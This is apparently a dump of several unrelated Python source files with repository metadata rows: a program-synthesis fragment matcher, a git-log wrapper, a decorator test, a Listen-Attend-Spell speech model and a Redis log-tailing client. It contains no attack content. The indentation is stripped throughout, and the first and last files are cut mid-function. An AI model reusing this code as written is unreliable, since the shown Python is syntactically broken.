expression = expression.shift(-surroundingAbstractions)
except ShiftFailure:
raise MatchFailure()
# Wrap it in the appropriate number of lambda expressions & applications
# This is because everything has to be in eta-longform
if numberOfArguments > 0:
expression = expression.shift(numberOfArguments)
for j in reversed(range(numberOfArguments)):
expression = Application(expression, Index(j))
for _ in range(numberOfArguments):
expression = Abstraction(expression)
# Added to the bindings
if i in self.variableBindings:
(tp, binding) = self.variableBindings[i]
if binding != expression:
raise MatchFailure()
else:
self.context, tp = self.context.makeVariable()
self.variableBindings[i] = (tp, expression)
return tp
def abstraction(
self,
fragment,
expression,
environment,
numberOfArguments):
if not isinstance(expression, Abstraction):
raise MatchFailure()
self.context, argumentType = self.context.makeVariable()
returnType = fragment.body.visit(
self, expression.body, [argumentType] + environment, 0)
return arrow(argumentType, returnType)
def primitive(self, fragment, expression, environment, numberOfArguments):
if fragment != expression:
raise MatchFailure()
self.context, tp = fragment.tp.instantiate(self.context)
return tp
def invented(self, fragment, expression, environment, numberOfArguments):
if fragment != expression:
raise MatchFailure()
self.context, tp = fragment.tp.instantiate(self.context)
return tp
def fragmentVariable(
self,
fragment,
expression,
environment,
numberOfArguments):
raise Exception(
'Deprecated: matching against fragment variables. Convert fragment to canonical form to get rid of fragment variables.')
def mightMatch(f, e, d=0):
'''Checks whether fragment f might be able to match against expression e'''
if f.isIndex:
if f.bound(d):
return f == e
return True
if f.isPrimitive or f.isInvented:
return f == e
if f.isAbstraction:
return e.isAbstraction and mightMatch(f.body, e.body, d + 1)
if f.isApplication:
return e.isApplication and mightMatch(
f.x, e.x, d) and mightMatch(
f.f, e.f, d)
assert False
def canonicalFragment(expression):
'''
Puts a fragment into a canonical form:
1. removes all FragmentVariable's
2. renames all free variables based on depth first traversal
'''
return expression.visit(CanonicalVisitor(), 0)
class CanonicalVisitor(object):
def __init__(self):
self.numberOfAbstractions = 0
self.mapping = {}
def fragmentVariable(self, e, d):
self.numberOfAbstractions += 1
return Index(self.numberOfAbstractions + d - 1)
def primitive(self, e, d): return e
def invented(self, e, d): return e
def application(self, e, d):
return Application(e.f.visit(self, d), e.x.visit(self, d))
def abstraction(self, e, d):
return Abstraction(e.body.visit(self, d + 1))
def index(self, e, d):
if e.bound(d):
return e
i = e.i - d
if i in self.mapping:
return Index(d + self.mapping[i])
self.mapping[i] = self.numberOfAbstractions
self.numberOfAbstractions += 1
return Index(self.numberOfAbstractions - 1 + d)
def fragmentSize(f, boundVariableCost=0.1, freeVariableCost=0.01):
freeVariables = 0
leaves = 0
boundVariables = 0
for surroundingAbstractions, e in f.walk():
if isinstance(e, (Primitive, Invented)):
leaves += 1
if isinstance(e, Index):
if e.bound(surroundingAbstractions):
boundVariables += 1
else:
freeVariables += 1
assert not isinstance(e, FragmentVariable)
return leaves + boundVariableCost * \
boundVariables + freeVariableCost * freeVariables
def primitiveSize(e):
if e.isInvented:
e = e.body
return fragmentSize(e)
def defragment(expression):
'''Converts a fragment into an invented primitive'''
if isinstance(expression, (Primitive, Invented)):
return expression
expression = canonicalFragment(expression)
for _ in range(expression.numberOfFreeVariables):
expression = Abstraction(expression)
return Invented(expression)
class RewriteFragments(object):
def __init__(self, fragment):
self.fragment = fragment
self.concrete = defragment(fragment)
def tryRewrite(self, e, numberOfArguments):
try:
context, t, bindings = Matcher.match(
Context.EMPTY, self.fragment, e, numberOfArguments)
except MatchFailure:
return None
assert frozenset(bindings.keys()) == frozenset(range(len(bindings))),\
"Perhaps the fragment is not in canonical form?"
e = self.concrete
for j in range(len(bindings) - 1, -1, -1):
_, b = bindings[j]
e = Application(e, b)
return e
def application(self, e, numberOfArguments):
e = Application(e.f.visit(self, numberOfArguments + 1),
e.x.visit(self, 0))
return self.tryRewrite(e, numberOfArguments) or e
def index(self, e, numberOfArguments): return e
def invented(self, e, numberOfArguments): return e
def primitive(self, e, numberOfArguments): return e
def abstraction(self, e, numberOfArguments):
e = Abstraction(e.body.visit(self, 0))
return self.tryRewrite(e, numberOfArguments) or e
def rewrite(self, e): return e.visit(self, 0)
@staticmethod
def rewriteFrontier(frontier, fragment):
worker = RewriteFragments(fragment)
return Frontier([FrontierEntry(program=worker.rewrite(e.program),
logLikelihood=e.logLikelihood,
logPrior=e.logPrior,
logPosterior=e.logPosterior)
for e in frontier],
task=frontier.task)
def proposeFragmentsFromFragment(f):
'''Abstracts out repeated structure within a single fragment'''
yield f
freeVariables = f.numberOfFreeVariables
closedSubtrees = Counter(
subtree for _,
subtree in f.walk() if not isinstance(
subtree,
Index) and subtree.closed)
del closedSubtrees[f]
for subtree, freq in closedSubtrees.items():
if freq < 2:
continue
yield canonicalFragment(f.substitute(subtree, Index(freeVariables)))
def nontrivial(f):
if not isinstance(f, Application):
return False
# Curry
if isinstance(f.x, FragmentVariable):
return False
if isinstance(f.x, Index):
# Make sure that the index is used somewhere else
if not any(
isinstance(
child,
Index) and child.i -
surroundingAbstractions == f.x.i for surroundingAbstractions,
child in f.f.walk()):
return False
numberOfHoles = 0
numberOfVariables = 0
numberOfPrimitives = 0
for surroundingAbstractions, child in f.walk():
if isinstance(child, (Primitive, Invented)):
numberOfPrimitives += 1
if isinstance(child, FragmentVariable):
numberOfHoles += 1
if isinstance(child, Index) and child.free(surroundingAbstractions):
numberOfVariables += 1
#eprint("Fragment %s has %d calls and %d variables and %d primitives"%(f,numberOfHoles,numberOfVariables,numberOfPrimitives))
return numberOfPrimitives + 0.5 * \
(numberOfHoles + numberOfVariables) > 1.5 and numberOfPrimitives >= 1
def violatesLaziness(fragment):
"""
conditionals are lazy on the second and third arguments. this
invariant must be maintained by learned fragments.
"""
for surroundingAbstractions, child in fragment.walkUncurried():
if not child.isApplication:
continue
f, xs = child.applicationParse()
if not (f.isPrimitive and f.name == "if"):
continue
# curried conditionals always violate laziness
if len(xs) != 3:
return True
# yes/no branches
y = xs[1]
n = xs[2]
return \
any(yc.isIndex and yc.i >= yd
for yd, yc in y.walk(surroundingAbstractions)) or \
any(nc.isIndex and nc.i >= nd
for nd, nc in n.walk(surroundingAbstractions))
return False
def proposeFragmentsFromProgram(p, arity):
def fragment(expression, a, toplevel=True):
"""Generates fragments that unify with expression"""
if a == 1:
yield FragmentVariable.single
if a == 0:
yield expression
return
if isinstance(expression, Abstraction):
# Symmetry breaking: (\x \y \z ... f(x,y,z,...)) defragments to be
# the same as f(x,y,z,...)
if not toplevel:
for b in fragment(expression.body, a, toplevel=False):
yield Abstraction(b)
elif isinstance(expression, Application):
for fa in range(a + 1):
for f in fragment(expression.f, fa, toplevel=False):
for x in fragment(expression.x, a - fa, toplevel=False):
yield Application(f, x)
else:
assert isinstance(expression, (Invented, Primitive, Index))
def fragments(expression, a):
"""Generates fragments that unify with subexpressions of expression"""
yield from fragment(expression, a)
if isinstance(expression, Application):
curry = True
if curry:
yield from fragments(expression.f, a)
yield from fragments(expression.x, a)
else:
# Pretend that it is not curried
function, arguments = expression.applicationParse()
yield from fragments(function, a)
for argument in arguments:
yield from fragments(argument, a)
elif isinstance(expression, Abstraction):
yield from fragments(expression.body, a)
else:
assert isinstance(expression, (Invented, Primitive, Index))
return {canonicalFragment(f) for b in range(arity + 1)
for f in fragments(p, b) if nontrivial(f)}
def proposeFragmentsFromFrontiers(frontiers, a, CPUs=1):
fragmentsFromEachFrontier = parallelMap(
CPUs, lambda frontier: {
fp for entry in frontier.entries for f in proposeFragmentsFromProgram(
entry.program, a) for fp in proposeFragmentsFromFragment(f)}, frontiers)
allFragments = Counter(f for frontierFragments in fragmentsFromEachFrontier
for f in frontierFragments)
return [fragment for fragment, frequency in allFragments.items()
if frequency >= 2 and fragment.wellTyped() and nontrivial(fragment)]
| 33.706897 | 132 | 0.608403 | 1,417 | 13,685 | 5.864502 | 0.191249 | 0.021179 | 0.015884 | 0.023827 | 0.163177 | 0.103008 | 0.074368 | 0.047413 | 0.047413 | 0.047413 | 0 | 0.005705 | 0.308367 | 13,685 | 405 | 133 | 33.790123 | 0.872266 | 0.096748 | 0 | 0.222222 | 0 | 0 | 0.013445 | 0 | 0 | 0 | 0 | 0 | 0.016835 | 1 | 0.121212 | false | 0.003367 | 0.013468 | 0.026936 | 0.276094 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e89c40d11f3ea99db83312ef63f2c4e642a883e6 | 2,842 | py | Python | git_interface/log.py | enchant97/python-git-interface | 0ac236f35610ec17f34e07d00e3dc7b9349a07b4 | [
"MIT"
] | null | null | null | git_interface/log.py | enchant97/python-git-interface | 0ac236f35610ec17f34e07d00e3dc7b9349a07b4 | [
"MIT"
] | 1 | 2021-12-10T09:59:06.000Z | 2021-12-10T09:59:06.000Z | git_interface/log.py | enchant97/python-git-interface | 0ac236f35610ec17f34e07d00e3dc7b9349a07b4 | [
"MIT"
] | 1 | 2021-10-10T07:20:09.000Z | 2021-10-10T07:20:09.000Z | """
Methods for using the 'log' command
"""
import re
from collections.abc import Coroutine, Iterator
from datetime import datetime
from pathlib import Path
from typing import Any, Optional
from .constants import EMPTY_REPO_RE, UNKNOWN_REV_RE
from .datatypes import Log
from .exceptions import (GitException, NoCommitsException, NoLogsException,
UnknownRevisionException)
from .helpers import subprocess_run
__all__ = ["get_logs"]
def __process_log(stdout_line: str) -> Log:
parts = stdout_line.split(";;")
if len(parts) != 6:
raise ValueError(f"invalid log line: {stdout_line}")
return Log(
parts[0],
parts[1],
parts[2],
parts[3],
datetime.fromisoformat(parts[4]),
parts[5],
)
def __process_logs(stdout: str) -> Iterator[Log]:
log_lines = stdout.strip().split("\n")
return map(__process_log, log_lines)
async def get_logs(
git_repo: Path,
branch: Optional[str] = None,
max_number: Optional[int] = None,
since: Optional[datetime] = None,
until: Optional[datetime] = None) -> Coroutine[Any, Any, Iterator[Log]]:
"""
Generate git logs from a repo
:param git_repo: Path to the repo
:param branch: The branch name, defaults to None
:param max_number: max number of logs to get, defaults to None
:param since: Filter logs after given date, defaults to None
:param until: Filter logs before given date defaults to None
:raises NoCommitsException: Repo has no commits
:raises UnknownRevisionException: Unknown revision/branch name
:raises GitException: Error to do with git
:raises NoLogsException: No logs have been generated
:return: The generated logs
"""
args = ["git", "-C", str(git_repo), "log"]
if branch is not None:
args.append(str(branch))
if max_number is not None:
args.append(f"--max-count={max_number}")
if since is not None:
args.append(f"--since={since.isoformat()}")
if until is not None:
args.append(f"--until={until.isoformat()}")
# formats: https://git-scm.com/docs/pretty-formats
args.append("--pretty=%H;;%P;;%ae;;%an;;%cI;;%s")
process_status = await subprocess_run(args)
if not process_status.stdout:
stderr = process_status.stderr.decode()
if re.match(EMPTY_REPO_RE, stderr):
raise NoCommitsException()
if re.match(UNKNOWN_REV_RE, stderr):
raise UnknownRevisionException(f"unknown revision/branch {branch}")
if process_status.returncode != 0:
raise GitException(stderr)
raise NoLogsException(f"no logs found (using given filters) for '{git_repo.name}'")
stdout = process_status.stdout.decode()
return __process_logs(stdout)
| 34.240964 | 91 | 0.656228 | 362 | 2,842 | 5.024862 | 0.334254 | 0.024739 | 0.030786 | 0.028587 | 0.068719 | 0.032985 | 0 | 0 | 0 | 0 | 0 | 0.003685 | 0.236101 | 2,842 | 82 | 92 | 34.658537 | 0.834178 | 0.029909 | 0 | 0 | 0 | 0 | 0.118868 | 0.05283 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.166667 | 0 | 0.259259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e89e4d3b337252097f719afef8ec42c9e3d2ddb5 | 916 | py | Python | tests/bdc_core/decorators/test_utils.py | raphaelrpl/bdc-core | 91b09905e809248521d3e782af0d77ee0fbde4a7 | [
"MIT"
] | 1 | 2020-02-06T13:54:48.000Z | 2020-02-06T13:54:48.000Z | tests/bdc_core/decorators/test_utils.py | raphaelrpl/bdc-core | 91b09905e809248521d3e782af0d77ee0fbde4a7 | [
"MIT"
] | 10 | 2019-07-15T18:30:14.000Z | 2020-05-18T20:32:42.000Z | tests/bdc_core/decorators/test_utils.py | raphaelrpl/bdc-core | 91b09905e809248521d3e782af0d77ee0fbde4a7 | [
"MIT"
] | 2 | 2019-07-04T12:31:56.000Z | 2019-07-10T15:01:21.000Z | import os
from tempfile import gettempdir
from unittest import TestCase
from bdc_core.decorators import utils
class TestDecoratorsUtils(TestCase):
@staticmethod
def get_working_dir(directory):
@utils.working_directory(directory)
def working_dir_wrapper():
return os.getcwd()
return working_dir_wrapper
def test_change_working_dir_to_temp(self):
test_dir = os.path.abspath(os.getcwd())
expected_dir = gettempdir()
get_working_dir = TestDecoratorsUtils.get_working_dir(expected_dir)
temp_dir = get_working_dir()
self.assertNotEqual(test_dir, temp_dir)
self.assertEqual(temp_dir, expected_dir)
def test_throw_error_invalid_directory(self):
get_working_dir = TestDecoratorsUtils.get_working_dir('/fake/It-Does-Not-Exists')
with self.assertRaises(FileNotFoundError):
get_working_dir() | 29.548387 | 89 | 0.721616 | 110 | 916 | 5.672727 | 0.390909 | 0.160256 | 0.145833 | 0.102564 | 0.144231 | 0.144231 | 0.144231 | 0 | 0 | 0 | 0 | 0 | 0.20524 | 916 | 31 | 90 | 29.548387 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0.026172 | 0.026172 | 0 | 0 | 0 | 0 | 0.136364 | 1 | 0.181818 | false | 0 | 0.181818 | 0.045455 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e89f1f87543ead1bd285811638e6a51a57f2f847 | 13,303 | py | Python | experiments/src/models/recognition/las.py | cricketclub/gridspace-stanford-harper-valley | 0bd721e877c4a85d8c13ff837e68661ea6200a98 | [
"CC-BY-4.0"
] | 10 | 2021-01-09T00:52:28.000Z | 2022-03-29T09:16:32.000Z | experiments/src/models/recognition/las.py | cricketclub/gridspace-stanford-harper-valley | 0bd721e877c4a85d8c13ff837e68661ea6200a98 | [
"CC-BY-4.0"
] | null | null | null | experiments/src/models/recognition/las.py | cricketclub/gridspace-stanford-harper-valley | 0bd721e877c4a85d8c13ff837e68661ea6200a98 | [
"CC-BY-4.0"
] | 7 | 2020-08-04T17:22:19.000Z | 2022-02-15T06:03:49.000Z | import os
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.utils.rnn as rnn_utils
from torch.distributions import Categorical
from src.utils import edit_distance
class LASEncoderDecoder(nn.Module):
def __init__(
self,
input_dim,
num_class,
label_maxlen,
listener_hidden_dim=256,
listener_num_layers=2,
listener_bidirectional=True,
speller_num_layers=1,
mlp_hidden_dim=128,
multi_head=1,
sos_index=0,
):
super().__init__()
self.listener = Listener(
input_dim,
hidden_dim=listener_hidden_dim,
num_pyramid_layers=listener_num_layers,
bidirectional=listener_bidirectional,
)
self.speller = Speller(
num_class,
label_maxlen,
listener_hidden_dim,
mlp_hidden_dim,
num_layers=speller_num_layers,
multi_head=multi_head,
sos_index=sos_index,
)
self.embedding_dim = listener_hidden_dim * 4
def combine_h_and_c(self, h, c):
batch_size = h.size(1)
h = h.permute(1, 0, 2).contiguous()
c = c.permute(1, 0, 2).contiguous()
h = h.view(batch_size, -1)
c = c.view(batch_size, -1)
return torch.cat([h, c], dim=1)
def forward(
self,
inputs,
input_lengths,
ground_truth=None,
teacher_force_prob=0.9,
):
listener_feats, (listener_h, listener_c) = self.listener(
inputs, input_lengths)
embedding = self.combine_h_and_c(listener_h, listener_c)
log_probs = self.speller(
listener_feats,
ground_truth=ground_truth,
teacher_force_prob=teacher_force_prob,
)
return log_probs, embedding
def get_loss(
self,
log_probs,
labels,
num_labels,
pad_index=0,
label_smooth=0.1,
):
batch_size = log_probs.size(0)
labels_maxlen = labels.size(1)
if label_smooth == 0.0:
log_probs = log_probs.view(batch_size * labels_maxlen, -1)
labels = labels.long().view(batch_size * labels_maxlen)
loss = F.nll_loss(log_probs, labels, ignore_index=pad_index)
else:
loss = label_smooth_loss(
log_probs, labels.float(), num_labels, smooth_param=label_smooth)
return loss
def decode(
self,
log_probs,
input_lengths,
labels,
label_lengths,
sos_index,
eos_index,
pad_index,
eps_index,
):
# Use greedy decoding.
decoded = torch.argmax(log_probs, dim=2)
batch_size = decoded.size(0)
# Collapse each decoded sequence using CTC rules.
hypotheses = []
hypothesis_lengths = []
references = []
reference_lengths = []
for i in range(batch_size):
decoded_i = decoded[i]
hypothesis_i = []
for tok in decoded_i:
if tok.item() == sos_index:
continue
if tok.item() == pad_index:
continue
if tok.item() == eos_index:
# once we reach an EOS token, we are done generating.
break
hypothesis_i.append(tok.item())
hypotheses.append(hypothesis_i)
hypothesis_lengths.append(len(hypothesis_i))
if labels is not None:
reference_i = [tok.item() for tok in labels[i]
if tok.item() != sos_index and
tok.item() != eos_index and
tok.item() != pad_index]
references.append(reference_i)
reference_lengths.append(len(reference_i))
if labels is None: # Run at inference time.
references, reference_lengths = None, None
return hypotheses, hypothesis_lengths, references, reference_lengths
class Listener(nn.Module):
"""Listener (encoder for LAS model). Use a bidirectional
LSTM as the encoder.
Args:
input_dim: integer
number of input features
num_class: integer
size of transcription vocabulary
num_layers: integer (default: 2)
number of layers in encoder LSTM
hidden_dim: integer (default: 128)
number of hidden dimensions for encoder LSTM
bidirectional: boolean (default: True)
is the encoder LSTM bidirectional?
"""
def __init__(
self,
input_dim,
hidden_dim=128,
num_pyramid_layers=2,
bidirectional=True,
dropout_rate=0.,
):
super().__init__()
self.rnn_layer0 = PyramidLSTMLayer(
input_dim, hidden_dim, num_layers=1, bidirectional=bidirectional, dropout=dropout_rate)
for i in range(1, num_pyramid_layers):
setattr(
self, f'rnn_layer{i}',
PyramidLSTMLayer(
hidden_dim * 2, hidden_dim, num_layers=1,
bidirectional=bidirectional, dropout=dropout_rate),
)
self.num_pyramid_layers = num_pyramid_layers
def forward(self, inputs, input_lengths):
outputs, hiddens = self.rnn_layer0(inputs)
for i in range(1, self.num_pyramid_layers):
outputs, hiddens = getattr(self, f'rnn_layer{i}')(outputs)
return outputs, hiddens
class Speller(nn.Module):
def __init__(
self,
num_labels,
label_maxlen,
listener_hidden_dim,
mlp_hidden_dim,
num_layers=1,
multi_head=1,
sos_index=0,
):
super().__init__()
speller_hidden_dim = listener_hidden_dim * 2
self.rnn = nn.LSTM(
num_labels + speller_hidden_dim,
speller_hidden_dim,
num_layers=num_layers,
batch_first=True,
)
self.attention = AttentionLayer(
speller_hidden_dim,
mlp_hidden_dim,
multi_head=multi_head,
)
self.fc_out = nn.Linear(speller_hidden_dim*2, num_labels)
self.num_labels = num_labels
self.label_maxlen = label_maxlen
self.sos_index = sos_index
def step(self, inputs, last_hiddens, listener_feats):
outputs, cur_hiddens = self.rnn(inputs, last_hiddens)
attention_score, context = self.attention(outputs, listener_feats)
features = torch.cat((outputs.squeeze(1), context), dim=-1)
logits = self.fc_out(features)
log_probs = torch.log_softmax(logits, dim=-1)
return log_probs, cur_hiddens, context, attention_score
def forward(
self,
listener_feats,
ground_truth=None,
teacher_force_prob=0.9,
):
device = listener_feats.device
if ground_truth is None: teacher_force_prob = 0
teacher_force = np.random.random_sample() < teacher_force_prob
batch_size = listener_feats.size(0)
with torch.no_grad():
output_toks = torch.zeros((batch_size, 1, self.num_labels), device=device)
output_toks[:, 0, self.sos_index] = 1
rnn_inputs = torch.cat([output_toks, listener_feats[:, 0:1, :]], dim=-1)
hidden_state = None
log_probs_seq = []
if (ground_truth is None) or (not teacher_force_prob):
max_step = int(self.label_maxlen)
else:
max_step = int(ground_truth.size(1))
for step in range(max_step):
log_probs, hidden_state, context, _ = self.step(
rnn_inputs, hidden_state, listener_feats)
log_probs_seq.append(log_probs.unsqueeze(1))
if teacher_force:
gt_tok = ground_truth[:, step:step+1].float()
output_tok = torch.zeros_like(log_probs)
for idx, i in enumerate(gt_tok):
output_tok[idx, int(i.item())] = 1
output_tok = output_tok.unsqueeze(1)
else:
# Pick max probability
output_tok = torch.zeros_like(log_probs)
sampled_tok = log_probs.topk(1)[1]
output_tok = torch.zeros_like(log_probs)
for idx, i in enumerate(sampled_tok):
output_tok[idx, int(i.item())] = 1
output_tok = output_tok.unsqueeze(1)
rnn_inputs = torch.cat([output_tok, context.unsqueeze(1)], dim=-1)
# batch_size x maxlen x num_labels
log_probs_seq = torch.cat(log_probs_seq, dim=1)
return log_probs_seq.contiguous()
class PyramidLSTMLayer(nn.Module):
"""A Pyramid LSTM layer is a standard LSTM layer that halves the size
of the input in its hidden embeddings.
"""
def __init__(self, input_dim, hidden_dim, num_layers=1,
bidirectional=True, dropout=0.):
super().__init__()
self.rnn = nn.LSTM(
input_dim * 2, hidden_dim, num_layers=num_layers,
bidirectional=bidirectional, dropout=dropout,
batch_first=True)
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.num_layers = num_layers
self.bidirectional = bidirectional
self.dropout = dropout
def forward(self, inputs):
batch_size, maxlen, input_dim = inputs.size()
# reduce time resolution?
inputs = inputs.contiguous().view(batch_size, maxlen // 2, input_dim * 2)
outputs, hiddens = self.rnn(inputs)
return outputs, hiddens
class AttentionLayer(nn.Module):
"""
Attention module as in http://www.aclweb.org/anthology/D15-1166.
Trains an MLP to get attention weights.
"""
def __init__(self, input_dim, hidden_dim, multi_head=1):
super().__init__()
self.phi = nn.Linear(input_dim, hidden_dim*multi_head)
self.psi = nn.Linear(input_dim, hidden_dim)
if multi_head > 1:
self.fc_reduce = nn.Linear(input_dim*multi_head, input_dim)
self.multi_head = multi_head
self.hidden_dim = hidden_dim
def forward(self, decoder_state, listener_feat):
input_dim = listener_feat.size(2)
# decoder_state: batch_size x 1 x decoder_hidden_dim
# listener_feat: batch_size x maxlen x input_dim
comp_decoder_state = F.relu(self.phi(decoder_state))
comp_listener_feat = F.relu(reshape_and_apply(self.psi, listener_feat))
if self.multi_head == 1:
energy = torch.bmm(
comp_decoder_state,
comp_listener_feat.transpose(1, 2)
).squeeze(1)
attention_score = [F.softmax(energy, dim=-1)]
weights = attention_score[0].unsqueeze(2).repeat(1, 1, input_dim)
context = torch.sum(listener_feat * weights, dim=1)
else:
attention_score = []
for att_query in torch.split(
comp_decoder_state,
self.hidden_dim,
dim=-1,
):
score = torch.softmax(
torch.bmm(
att_query,
comp_listener_feat.transpose(1, 2),
).squeeze(dim=1),
)
attention_score.append(score)
projected_src = []
for att_s in attention_score:
weights = att_s.unsqueeze(2).repeat(1, 1, input_dim)
proj = torch.sum(listener_feat * weights, dim=1)
projected_src.append(proj)
context = self.fc_reduce(torch.cat(projected_src, dim=-1))
# context is the entries of listener input weighted by attention
return attention_score, context
def reshape_and_apply(Module, inputs):
batch_size, maxlen, input_dim = inputs.size()
reshaped = inputs.contiguous().view(-1, input_dim)
outputs = Module(reshaped)
return outputs.view(batch_size, maxlen, -1)
def label_smooth_loss(log_probs, labels, num_labels, smooth_param=0.1):
# convert labels to one_hotted
with torch.no_grad():
batch_size, maxlen = labels.size()
labels_onehotted = torch.zeros(
(batch_size, maxlen, num_labels),
device=labels.device,
).long()
labels_onehotted = labels_onehotted.scatter_(
-1, labels.long().unsqueeze(2), 1)
labels = labels_onehotted
assert log_probs.size() == labels.size()
label_lengths = torch.sum(torch.sum(labels, dim=-1), dim=-1, keepdim=True)
smooth_labels = ((1.0 - smooth_param) * labels + (smooth_param / num_labels)) * \
torch.sum(labels, dim=-1, keepdim=True)
loss = torch.sum(smooth_labels * log_probs, dim=-1)
loss = torch.sum(loss / label_lengths, dim=-1)
return -loss.mean()
| 33.936224 | 99 | 0.574682 | 1,557 | 13,303 | 4.632627 | 0.152216 | 0.039928 | 0.014973 | 0.016498 | 0.289893 | 0.199501 | 0.138361 | 0.093442 | 0.05906 | 0.05906 | 0 | 0.014432 | 0.338495 | 13,303 | 391 | 100 | 34.023018 | 0.805227 | 0.084793 | 0 | 0.281457 | 0 | 0 | 0.001988 | 0 | 0 | 0 | 0 | 0 | 0.003311 | 1 | 0.05298 | false | 0 | 0.02649 | 0 | 0.13245 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8a0290b80b580216e83f792f9ef79d1580941d9 | 5,678 | py | Python | client/tail/src/tail/itail.py | flythinker/iloghub | 55fbe552e6d479ba757c2036f744647623b0a009 | [
"Apache-2.0"
] | 2 | 2018-07-02T07:07:03.000Z | 2018-07-15T05:14:40.000Z | client/tail/src/tail/itail.py | flythinker/iloghub | 55fbe552e6d479ba757c2036f744647623b0a009 | [
"Apache-2.0"
] | null | null | null | client/tail/src/tail/itail.py | flythinker/iloghub | 55fbe552e6d479ba757c2036f744647623b0a009 | [
"Apache-2.0"
] | 2 | 2018-07-10T09:41:16.000Z | 2018-10-19T07:54:55.000Z | import logging
import redis
import time
import math
import getopt
import sys,os
import yaml
from pathlib import Path
logger = logging.getLogger('itail')
formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)-8s: %(message)s')
console_handler = logging.StreamHandler(sys.stdout)
console_handler.formatter = formatter # 也可以直接给formatter赋值
logger.addHandler(console_handler)
logger.setLevel(logging.INFO)
ilogback_client_sample_yml='''
redis:
host: 127.0.0.1
port: 6379
pass: pass
database: 0
'''
class LogHubTail:
def __init__(self):
self.f_arg = None
self.c_arg = None
self.isOnlyStat = False
self.isShowChannleName = False
def init_action(self):
logger.info("start init")
cwd = os.getcwd()
filepath = cwd + "/iloghub_client.yml"
if not os.path.exists(filepath):
logger.info("created file -> ",filepath )
file_object = open(filepath, 'w')
file_object.write(ilogback_client_sample_yml)
file_object.close()
home = str(Path.home())
glb_iloghub_cfg_dir = home + '.iloghub'
if not os.path.exists(glb_iloghub_cfg_dir):
os.mkdir(glb_iloghub_cfg_dir)
print( "created dir -> " , glb_iloghub_cfg_dir )
def read_config(self):
# 读取配置文件
config_filepath = self.c_arg
if (config_filepath == None):
# 先读取当前文件
cwd = os.getcwd()
filepath = cwd + "/iloghub_client.yml"
filepath2 = home = str(Path.home()) + "/.iloghub/iloghub_client.yml"
if os.path.exists(filepath): #如果存在
config_filepath = filepath
elif os.path.exists(filepath2):
config_filepath = filepath2
else:
pass
if config_filepath == None :
logger.info("ilogback_client.yml is not exist.Please initial it by 'itail init' command")
sys.exit(0)
logger.info( "read config file from: %s" % config_filepath )
f = open( config_filepath )
self.config = yaml.load(f)
f.close()
print('config',self.config )
def start_tail_task(self):
if self.isOnlyStat:
logger.info('itail starting (only Statistics)')
else:
logger.info('itail starting ')
#config
#{'redis': {'host': '127.0.0.1', 'port': 6379, 'pass': 'pass', 'database': 0}}
redisConfig = self.config['redis']
redis_host = redisConfig['host']
redis_port = redisConfig['port']
redis_pass = redisConfig['pass']
redis_database = redisConfig ['database']
pool = redis.ConnectionPool(host=redis_host, port=redis_port, db=redis_database)
r = redis.Redis(connection_pool=pool)
r.execute_command("AUTH", redis_pass)
logger.info('redis connect success')
# 接收消息
ps = r.pubsub()
# ps.subscribe('log.hyp.mydev1')
ps.psubscribe( self.f_arg )
self.last_time_10sec_int = math.floor(time.time() / 10) # 每5秒种这个值变化一次
self.total_line = 0
self.total_size = 0
def handle_message(message):
if message['type'] == 'message' or message['type'] == 'pmessage':
if not self.isOnlyStat:
logLine = message['data'].decode("utf8")
if self.isShowChannleName :
chName = message['channel'].decode("utf8")
print( chName +"->"+ logLine )
else:
print( logLine )
else:
cur_time_10sec_int = math.floor(time.time() / 5)
if cur_time_10sec_int == self.last_time_10sec_int:
self.total_line += 1
self.total_size += len(message['data'])
else:
logger.info("10sec stat -- line:%s bytes:%s" % (self.total_line, self.total_size))
total_line = 1
total_size = len(message['data'])
self.last_time_10sec_int = cur_time_10sec_int
while True:
message = ps.get_message()
if message:
handle_message(message)
time.sleep(0.001) # be nice to the system :)
else:
time.sleep(0.1)
# def listen_task():
# logger.info("listen_task ... ")
# for message in ps.listen():
# handle_message(message)
# logger.info('start listen log:' + self.f_arg)
# listen_task()
# 再读取全局配置
def start_tail(self):
self.opts, self.args = getopt.getopt(sys.argv[1:], 'nsf:c:', []) # -n 显示通道名称 -s 只做统计 -f loghub_日志通道名称 -c 手动制定配置文件
logger.info ( ["opts" , self.opts] )
logger.info( ["args", self.args] )
if "init" in self.args:
self.init_action()
sys.exit(0)
for opt in self.opts:
print( opt[0], opt[1] )
if opt[0] == '-f':
self.f_arg = opt[1]
if opt[0] == '-c':
self.c_arg = opt[1]
if opt[0] == '-s':
self.isOnlyStat = True
if opt[0] == '-n':
self.isShowChannleName = True
self.read_config()
if self.f_arg is not None:
self.start_tail_task()
else:
logger.error("-n 显示通道名称 -s 只做统计 -f loghub_日志通道名称 -c 手动制定配置文件 \r\n -f parameter is not exists.")
def main():
tail = LogHubTail()
tail.start_tail()
if __name__ == "__main__":
#test1()
